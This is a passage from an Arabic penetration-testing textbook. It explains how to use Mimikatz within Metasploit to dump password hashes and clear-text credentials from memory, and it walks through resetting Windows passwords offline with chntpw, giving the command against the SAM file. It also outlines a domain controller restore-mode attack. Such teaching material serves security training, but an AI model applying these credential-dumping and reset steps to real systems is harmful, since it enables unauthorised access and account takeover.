‫ﺗوﻗف ﻣﻌظم اﻟﻣﯾزات ﻟﺗﻛون ﻏﯾر ﻓﻌﺎﻟﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪361‬‬

‫ﯾﺗﺑﯾن ﻣن ھذا ان ﺑﯾﻧﺔ اﻟﻧظﺎم ھﻲ ‪ bit32‬ﻟذﻟك ﺳوف ﻧﻘوم ﺑﺗﺣﻣﯾل‪ Mimikatz‬اﻟﺧﺎص ﺑﮭذه اﻟﺑﯾﻧﺔ ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ .load mimikatz‬اﻣﺎ‬
‫إذا ﻛﺎﻧت اﻟﺑﻧﯾﮫ‪ bit64‬ﻓﻧﺳﺗﺧدم اﻻﻣر ‪ .load mimikatz.64‬وﯾﻣﻛن ﻋرض اﻷواﻣر اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ ﻋن طرﯾﻖ ‪.help‬‬

‫‪ Metasploit‬ﯾوﻓر ﻟﻧﺎ ﺑﻌض اﻷواﻣر اﻟﻣﺿﻣﻧﺔ اﻟﺗﻲ ﺗﻌرض ﻟﻧﺎ اﻟﻣﯾزة اﻷﻛﺛر ﺷﯾوﻋﺎ ﻓﻲ اﻻﺳﺗﺧدام ﻟل ‪ ، Mimikatz‬وﺗﻔرﯾﻎ اﻟﮭﺎش ووﺛﺎﺋﻖ‬
‫اﻟﺗﻔوﯾض ﻓﻲ ﻧص واﺿﺢ )‪ (dumping hashes and clear text credentials straight‬ﻣﺑﺎﺷرة ﻣن اﻟذاﻛرة‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺈن اﻻﻣر‬
‫"‪ "mimikatz_command‬ﯾﺗﯾﺢ ﻟﻧﺎ اﻟوﺻول اﻟﻛﺎﻣل إﻟﻰ ﻛﺎﻓﺔ ﻣﻣﯾزات ﻓﻲ ‪.Mimikatz‬‬

‫‪Reading Hashes and Passwords from Memory‬‬

‫ﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام ﻛﻼ ﻣن اﻷواﻣر اﻟﻣدﻣﺟﺔ ﻣن ﻗﺑل ‪ metasploit‬واواﻣر ‪ Mimikatz‬ﻻﺳﺗﺧراج اﻟﮭﺎش و‪ clear-text credentials‬ﻣن‬
‫اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪362‬‬

‫ﺑﻌد اﺳﺗﺧدام اﻻﻣر ‪ msv‬ﯾﻌطﯾك ﻗﺎﺋﻣﮫ ﺑﮭﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھﻧﺎ ﯾﻣﻛﻧك اﻧﺗزاع اﻟﮭﺎش وﻣﺣﺎوﻟﺔ ﻛﺳره‪ ،‬أو ﺗﺷﻐﯾﻠﮫ ﻣن ﺧﻼل ﺟدول ‪rainbow‬‬
‫‪ table‬ﻋﻠﻰ اﻻﻧﺗرﻧت‪ ،‬وﻟﻛن ﻣﺎذا ﻟو ﻟم ﯾﻛن ﻟدﯾﻧﺎ ھذا اﻟﻧوع ﻣن اﻟوﻗت؟‬
‫ﺳﯾﻛون ﻣن اﻟﺟﻣﯾل ﻓﻘط اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدي‪.‬‬
‫ﺣﺳﻧﺎ ﯾﻣﻛن ذﻟك‪ ،‬ﺣﯾث ﯾﻘوم ﻓﻘط اﻟﻣﺳﺗﺧدم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﺣﯾﻧﮭﺎ ﯾﻣﻛﻧك ﻛﺗﺎﺑﺔ اﻻﻣر ‪.kerberos‬‬

‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ ﻧﻔس اﻟﻧﺗﯾﺟﺔ أﯾﺿﺎ ﺑﺎﺳﺗﺧدام ‪ wdigest‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻟدﯾك أﯾﺿﺎ "‪ "livessp‬ﺣﯾث ان اﻟﻌدﯾد ﻣن أﻧظﻣﺔ ‪ Win8‬ﺗﺳﺗﺧدم ﺣﺳﺎب اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻻﻋﺗﻣﺎد ﺗﺳﺟﯾل اﻟدﺧول اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ﻣﻊ‬
‫‪Mimikatz‬ﯾﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺣد ﺳواء اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﺳر ﻟﻠﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮭم‬
‫ﺑﺎﺳﺗﺧدام اﻣر واﺣد‪.‬‬
‫ﯾﻣﻛن أﯾﺿﺎ اﺳﺗﺧدام اﻻﻣر ‪ mimikatz_command‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ‬

‫‪Password Resetting: The Building and the Wrecking Ball‬‬


‫ھﻧﺎك ﺧﯾﺎر آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذه اﻟﺗﻘﻧﯾﺔ ھﻲ ھﺟوم ﻣﺣﻠﻲ أي ﯾﺗطﻠب اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف )ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ ‪(Live CD‬؛‬
‫وﻋﻠﻰ اﻟرﻏم ﻣن أﻧﮭﺎ ﻓﻌﺎﻟﺔ ﺟدا ﻓﻲ ﻛﺳب ﺻﻼﺣﯾﺎت اﻟوﺻول إﻟﻰ اﻟﮭدف‪ ،‬ﺑل ھو أﯾﺿﺎ ﺻﺎﺧﺑﺔ ﺟدا‪ .‬ﻓﻲ ﺟزء ﺳﺎﺑﻖ‪ ،‬ﻧوﻗﺷت ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﻣرو‪ .‬ﻋﻧدﻣﺎ ﯾﻛون اﻟﻣﮭﺎﺟم ﻗﺎدر ﻋﻠﻰ اﻟوﺻول إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف ﻟﺑﺿﻊ دﻗﺎﺋﻖ ﻓﻘط‪ ،‬ﻓﺄﻧﮫ ﯾﻛون ﻗﺎدرا ﻋﻠﻰ اﻟﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن ھﺎش‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻛل اﻷﻣور ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬وھذا ﯾﻣﻛن أن ﯾﻛون اﻟﮭﺟوم اﻟﺧﻔﻲ ﺟدا وﯾﺻﻌب اﻛﺗﺷﺎﻓﮭﺎ‪.‬‬

‫‪ Password resetting‬ھو أﺳﻠوب آﺧر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم أو ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات؛ وﻣﻊ ذﻟك‪ ،‬ھذا اﻷﺳﻠوب ھو أﻗل‬
‫ﺑﻛﺛﯾر ﻣن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻗد ﺗﻛون ﻓﻌﺎﻟﺔ‪ ،‬ﻟﻛن ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﯾﻘﯾن ﻣن أن ﻣﺎﻟك اﻟﻧظﺎم واﻟﻣوظﻔﯾن ﺳوف ﯾﻌرﻓون ان ھﻧﺎك ﻣن‬
‫اﺳﺗوﻟﻰ ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪ Password resetting‬ھﻲ ﺗﻘﻧﯾﺔ ﺗﺳﻣﺢ ﻟﻣﮭﺎﺟم ﺑﺎﻟﻛﺗﺎﺑﺔ ﺣرﻓﯾﺎ ﻋﻠﻰ اﻟﻣﻠف ‪ SAM‬وإﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور ﺟدﯾدة ﻷي ﻣﺳﺗﺧدم ﻋﻠﻰ ﻧظﺎم‬
‫وﯾﻧدوز اﻟﺣدﯾﺛﺔ‪ .‬ﯾﻣﻛن ﺗﻧﻔﯾذ ھذه اﻟﻌﻣﻠﯾﺔ دون أن ﯾﻌرف ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻛﻣﺎ ذﻛرت‪ ،‬ﻓﺈﻧﮭﺎ ﺗﺗطﻠب أن ﯾﻛون ﻟدﯾك اﻟوﺻول‬
‫اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﺟﮭﺎز‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪363‬‬

‫ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت اﻷﺧرى اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب‪ ،‬ﻣن اﻟﻣﮭم أﯾﺿﺎ أن ﻧﻔﮭم اﻵﺛﺎر اﻟﻣﺗرﺗﺑﺔ ﻋﻠﻰ ھذه اﻟﺗﻘﻧﯾﺔ‪ .‬ﺑﻣﺟرد ﺗﻐﯾﯾر‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻟن ﯾﻛون ھﻧﺎك أي وﺳﯾﻠﺔ ﻻﺳﺗﻌﺎدﺗﮭﺎ‪ .‬ﻋﻧد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻓﻲ اﻟﻣرة اﻟﻘﺎدﻣﺔ ﯾﺣﺎول ﻣﺳﺗﺧدم اﻟدﺧول ﻓﯾرى أن ﺗم‬
‫ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫ﺑﻐض اﻟﻧظر ﻋن ھذا‪ ،‬ﻓﮭذه ﻻ ﺗزال ﺗﻘﻧﯾﺔ ﻗوﯾﺔ ﺑﺷﻛل ﻻ ﯾﺻدق واﺣد ﯾﻣﻛن أن ﺗﻛون ﻣﻔﯾد ﺟدا ﻣن أﺟل اﻟوﺻول إﻟﻰ ﻧظﺎم‪ .‬ﻟﺗﻧﻔﯾذ إﻋﺎدة ﺗﻌﯾﯾن‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬وﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف ﻣرة أﺧرى إﻟﻰ ﻛﺎﻟﻲ ‪ DVD‬أو ﻣﺣرك أﻗراص‪ .‬ﺑﻣﺟرد اﻟدﺧول اﻟﻰ اﻟﻧظﺎم اﻟﺑدﯾل‪ ،‬ﻣن‬
‫ﺧﻼل اﻟﺗرﻣﻧﺎل‪ ،‬ﻓﺄﻧك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑﺗﺔ اﻟﻔﻌﻠﯾﺔ ﻟﻠﻧظﺎم اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ .SAM‬ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ‬
‫اﻟﺗﻌﻠﯾﻣﺎت ﻟﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻓﻲ ﻣﻘطﻊ ﺳﺎﺑﻖ ﺷرح ﻣن ﻗﺑل‪.‬‬
‫ﻣن ھﻧﺎ‪ ،‬ﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر "‪ "chntpw‬ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻟﻣراﺟﻌﺔ اﻟﺧﯾﺎرات اﻟﻛﺎﻣﻠﺔ واﻟﺗﺑدﯾل اﻟﻣﺗوﻓرة‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻷﻣر‬
‫]‪[chntpw –h‬‬ ‫اﻟﺗﺎﻟﻲ‪:‬‬
‫اﻓﺗرض أﻧك ﺗرﯾد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳؤول ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ﻹﻧﺟﺎز ھذا‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#chntpw©–i©/mnt/sda1/WINDOWS/system32/config/SAM‬‬
‫ﻓﻲ اﻷﻣر أﻋﻼه‪ ،‬ﯾﺗم اﺳﺗﺧدام "‪ "chntpw‬ﻟﺑدء ﺑرﻧﺎﻣﺞ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬واﻟﺗﻌﺑﯾر “‪ "-i‬ﯾﺳﺗﺧدم ﻟﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻓﻲ ﻗذﯾﻔﺔ ﺗﻔﺎﻋﻠﯾﮫ‬
‫)‪ (interactive‬ﺣﯾث ﯾﺳﻣﺢ ﻟك اﺧﺗﯾﺎر اﺳم اﻟﻣﺳﺗﺧدم اﻟذي ﺗود إﻋﺎدة ﺗﻌﯾﯾﻧﮫ‪ .‬و"‪"mnt/sda1/WINDOWS/system32/config/SAM/‬‬
‫ھو اﻟﻣﺳﺎر اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ SAM‬ﻓﻲ اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬
‫ﺑﻌد ﺗﺷﻐﯾل اﻷﻣر‪ ،‬ﺳﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺳﻣﺢ ﻟك ﺑﺈﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳﺗﺧدم اﻟﻣطﻠوب‪.‬‬
‫ﻛل ﺧطوة ﻣن اﻟﺧطوات ﯾوﺿﻊ ﻣﻌﺎ وﺻف ﻟﮭﺎ؛ ﺑﺑﺳﺎطﺔ ﯾﺟب ﻋﻠﯾك اﺗﺧﺎذ ﺑﺿﻊ ﻟﺣظﺎت ﻟﻘراءة ﻣﺎ ھو ﻣطﻠوب‪ .‬ﺗم ﺗﺻﻣﯾم اﻟﺑرﻧﺎﻣﺞ ﻓﻌﻼ ﻣﻊ‬
‫ﺳﻠﺳﻠﺔ ﻣن اﻹﺟﺎﺑﺎت "اﻻﻓﺗراﺿﯾﺔ" ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﻟﺿﻐط ﻋﻠﻰ ﻣﻔﺗﺎح "دﺧول" ﻟﻘﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ‪.‬‬
‫ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪ ،‬ﺑﻌد اﻟﺗﺣﻣﯾل اﻷداة‪ ،‬ﺳﯾطﻠب ﻣﻧك اﻹﺟﺎﺑﺔ ﻋﻠﻰ ﻋدة أﺳﺋﻠﺔ‪.‬‬
‫اﻟﺳؤال اﻷول ﯾطﻠب ﻣﻧك ﻣﺎذا ﺗﻔﻌل "‪[1] What to do‬؟ " ﻓوق اﻟﺳؤال‪ ،‬ﺳﺗﺷﺎھد ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات ﻟﻼﺧﺗﯾﺎر ﻣن ﺑﯾﻧﮭﺎ‪ .‬ﺑﺑﺳﺎطﺔ إدﺧﺎل‬
‫اﻟرﻗم أو اﻟﺣرف اﻟذي ﯾﺗواﻓﻖ ﻣﻊ اﻟﺧﯾﺎر اﻟذي ﺗرﯾده ﺛم ﺗﻧﻘر ﻋﻠﻰ اﻟﻣﻔﺗﺎح "‪ "Enter‬ﻟﻠﻣﺗﺎﺑﻌﺔ‪ .‬و"]‪ "[1‬ﺑﻌد اﻟﺳؤال ﯾﺷﯾر إﻟﻰ أن اﺧﺗﯾﺎر "‪ "1‬ھو‬
‫اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ‪.‬‬

‫ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا‪ ،‬ﻧﺣن ﻧﺧطط ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب اﻟﻣﺳؤول‪ ،‬وﺣﺗﻰ ﻧﺗﻣﻛن ﻣن ھذا ﻧﻛﺗب ]‪ [1‬او ﻧﻧﻘر ﻓوق ‪ Enter‬ﻟﻘﺑول اﻻﻋداد‬
‫اﻻﻓﺗراﺿﻲ‪ .‬اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ ﯾﻘدم ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﺟﮭﺎز ‪ Windows‬اﻟﻣﺣﻠﻲ‪ .‬ﯾﻣﻛﻧك ﺗﺣدﯾد اﻟﻣﺳﺗﺧدم اﻟﻣطﻠوب‬
‫ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم ﻛﻣﺎ ھو ﻣﻌروض‪ .‬ﻣرة أﺧرى‪ ،‬ﺳوف ﻧﺳﺗﺧدم اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ "‪ ."Administrator‬ﯾﺑﯾن اﻟﺷﻛل ﻟﻘطﺔ ﻣن‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗﺎﺣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪364‬‬

‫اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﯾﻘدم ﻟﻧﺎ ﻣﺧﺗﻠف اﻟﺧﯾﺎرات ﻟﺗﺣرﯾر اﺳم اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪ .‬ﯾرﺟﻰ ﻣﻼﺣظﺔ أﻧﮫ ﻓﻲ‬
‫ھذه اﻟﺧطوة‪ ،‬ﻓﺈﻧك ﻟن ﺗرﻏب ﻓﻲ ﻗﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ!‬

‫ﺑدﻻ ﻣن ﻗﺑول اﻟﺟواب اﻻﻓﺗراﺿﻲ ﻟﮭذه اﻟﺷﺎﺷﺔ‪ ،‬ﻓﮭﻧﺎ ﺑﻌد ﺗﺣدﯾد اﻟﺧﯾﺎر " ‪ " 1‬واﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻓﺑﻌد اﺧﺗﯾﺎرك اﻻﺧﺗﯾﺎر ]‪[1‬‬
‫واﻟﻧﻘر ﻋﻠﻰ ‪ Enter‬واﻻﻧﺗﮭﺎء ﻣن ﻣﺳﺢ ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺳوف ﺗﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺔ‪ "!password cleared " :‬ﻋﻧد ھذه اﻟﻧﻘطﺔ‪ ،‬ﯾﻣﻛﻧك‬
‫إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺗﺧدم آﺧر أو إدﺧﺎل اﻟرﻣز ]![ ﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ‪ .‬ﻣن اﻟﻣﮭم إﻛﻣﺎل اﻟﺧطوات اﻟﻣﺗﺑﻘﯾﺔ ﻷﻧﮫ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‬
‫ﻟم ﯾﺗم ﻛﺗﺎﺑﺔ ﻣﻠف ‪ SAM‬اﻟﺟدﯾدة ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﻓﻲ اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ‪ ،‬أدﺧل " ‪ " q‬ﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ‪ .‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ‬
‫ﺗﺳﺄﻟك ﻋﻣﺎ إذا ﻛﻧت ﺗرﻏب ﻓﻲ إرﺳﺎل اﻟﺗﻐﯾﯾرات إﻟﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﺗﺄﻛد ﻣن إدﺧﺎل " ‪ " y‬ﻓﻲ ھذه اﻟﺧطوة ﺣﯾث أن اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ ھﻧﺎ‬
‫)‪.(n‬‬
‫ﻗد ﺗم اﻵن ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟذي اﺧﺗﯾر وأﺻﺑﺢ ﻓﺎرغ‪ .‬ﯾﻣﻛﻧك إﯾﻘﺎف ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣؤﻗت ﻛﺎﻟﻲ ﺑﺈﺻدار اﻷﻣر " ‪" reboot‬‬
‫وإﺧراج ‪ .DVD‬ﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل‪ ، Windows‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﺣﺳﺎب ﻣن ﺧﻼل ﺗرك ﻛﻠﻣﺔ اﻟﻣرور ﻓﺎرﻏﺔ‪.‬‬
‫ﻣﻊ اﻟﻘﻠﯾل ﻣن اﻟﻣﻣﺎرﺳﺔ‪ ،‬ﻓﺎن ھذه اﻟﻌﻣﻠﯾﺔ ﺑرﻣﺗﮭﺎ‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﻣﮭﯾد ﻛﺎﻟﻲ‪ ،‬وﺗطﮭﯾر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬واﻟﺣﺎﺟﺔ إﻟﻰ وﯾﻧدوز‪ ،‬وﯾﻣﻛن اﻻﻧﺗﮭﺎء ﻣﻧﮭﺎ ﻓﻲ‬
‫أﻗل ﻣن ‪ 5‬دﻗﺎﺋﻖ‪.‬‬

‫‪Resetting a Password on a Domain Controller‬‬

‫‪Windows domain controllers‬ﻻ ﺗﺧزن ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ اﻟﻣﻠف ‪ ، SAM‬وإﻧﻣﺎ ﻓﻲ ‪.Active Directory‬‬
‫‪ Active Directory‬ﻻ ﯾﻣﻛن ﺗﺣرﯾره ﯾدوﯾﺎ )‪ ، (offline‬ﺑﺣﯾث ﯾﺗم اﺗﺧﺎذ ﻧﮭﺞ ﻣﺧﺗﻠف ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﻣﻛن ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم‬
‫اﻟدوﻣﯾن ‪ Windows domain controllers‬دون ﺧدﻣﺔ ‪ Active Directory‬وﺗﺳﻣﻰ )‪.(Active Directory Restore Mode‬‬
‫وﻋﺎدة ﻣﺎ ﯾﺗم ذﻟك ﻟﺻﯾﺎﻧﺔ ‪ Active Directory‬أو ‪ .defragmentation‬ﻋﻧدﻣﺎ ﻟم ﯾﺗم ﺗﺣﻣﯾل ‪ ،Active Directory‬ﻓﺎن وﺣدة ﺗﺣﻛم‬
‫اﻟدوﻣﯾن )‪ (Windows domain controllers‬ﺗﻌود ﻣؤﻗﺗﺎ إﻟﻰ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ وﺳوف ﺗﺳﺗﺧدم ﻣرة أﺧرى اﻟﻣﻠف ‪SAM‬‬
‫اﻟﻣوﺟودة ﻋﻠﻰ اﻟﺟﮭﺎز‪ .‬وﻋﻧدھﺎ ﻣن اﻟﻣﻣﻛن إﻧﺷﺎء ھﺟوم ﻣﺣﺗﻣل ﻣﺗﺟﮫ ﯾﻛون ﻹﻋﺎدة ‪ /‬ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳؤول اﻟﻣﺣﻠﻲ ﻟوﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‬
‫)ﻋن طرﯾﻖ اﻟﺗﻼﻋب ‪ SAM‬أو ‪ (dumping‬وﻣن ﺛم ﺗﺣﻣﯾل ھذا اﻻﻣر اﻟﻰ ‪ Active Directory‬اﻟﻣوﺟود ﻓﻲ اﻟوﺿﻊ ‪Restore Mode‬‬
‫وﺗﺳﺟﯾل اﻟدﺧول ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻌدﻟﺔ او اﻟﻣﻛﺳورة‪ .‬ﺑﻣﺟرد ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﯾﺗم ﺗﺛﺑﯾت ﺧدﻣﺔ اﻟﺗﻲ ﺗﻧﻔذ اﻷﻣر ‪) net user‬ﻣﻊ اﻣﺗﯾﺎزات‬
‫‪ .(SYSTEM‬وﺑﻣﺟرد إﻋﺎدة ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﻓﺎن ﯾﺳﻣﺢ ﺑﺗﺣﻣﯾل ‪ ،Active Directory‬وھﻧﺎ ﺗﻘوم اﻟﺧدﻣﺔ ﺑﺈﺿﺎﻓﺔ او ﺗﻌدﯾل‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺳﻣﺢ ﻟك ﺑﺎﻟدﺧول ﺑﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﻐﯾرھﺎ‪ .‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.nobodix.org/seb/win2003_adminpass.html‬‬
‫‪Resetting Linux Systems‬‬

‫ﻓﻲ ﻟﯾﻧﻛس‪ ،‬ﯾﺗم اﺳﺗﺧدام ﺗﻘﻧﯾﺔ ﻣﻣﺎﺛﻠﺔ ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت اﻟﻣرور ‪ .root‬ﯾﺗم إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز إﻣﺎ ﻓﻲ ‪ single mode‬أو ﺗﺷﻐﯾل ﻣن ﻧظﺎم‬
‫ﺗﺷﻐﯾل آﺧر‪ .‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ھذا ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://linuxgazette.net/107/tomar.html‬‬

‫اﻻن وﻗد ﺳردﻧﺎ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت اﻟﻣﻌﺗﻣدة ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش اﻟﺧﺎص ﺑﻛﻠﻣﺔ اﻟﻣرور ﻟﻛﺳرھﺎ واﻻن ﻧﻧﺗﻘل اﻟﻰ ﺟزء اﺧر واﻟذي ﯾﺿم‬
‫اﻟﻌدﯾد ﻣن اﻷدوات وھو ‪.Online Password Attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪365‬‬

‫‪Online Password Attack: Gaining Access to Remote Services‬‬

‫ﻋﻧد اﺳﺗﻌراض ﻧﺎﺗﺞ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ )‪ ،(Footprinting‬ﻓﯾﺟب ﻋﻠﯾك داﺋﻣﺎ وﺿﻊ ﻣﻼﺣظﺎت ﺧﺎﺻﺔ ﻋن ﺑروﺗوﻛول اﻹﻧﺗرﻧت )‪ (IP‬ﻟﻠﻌﻧﺎوﯾن‬
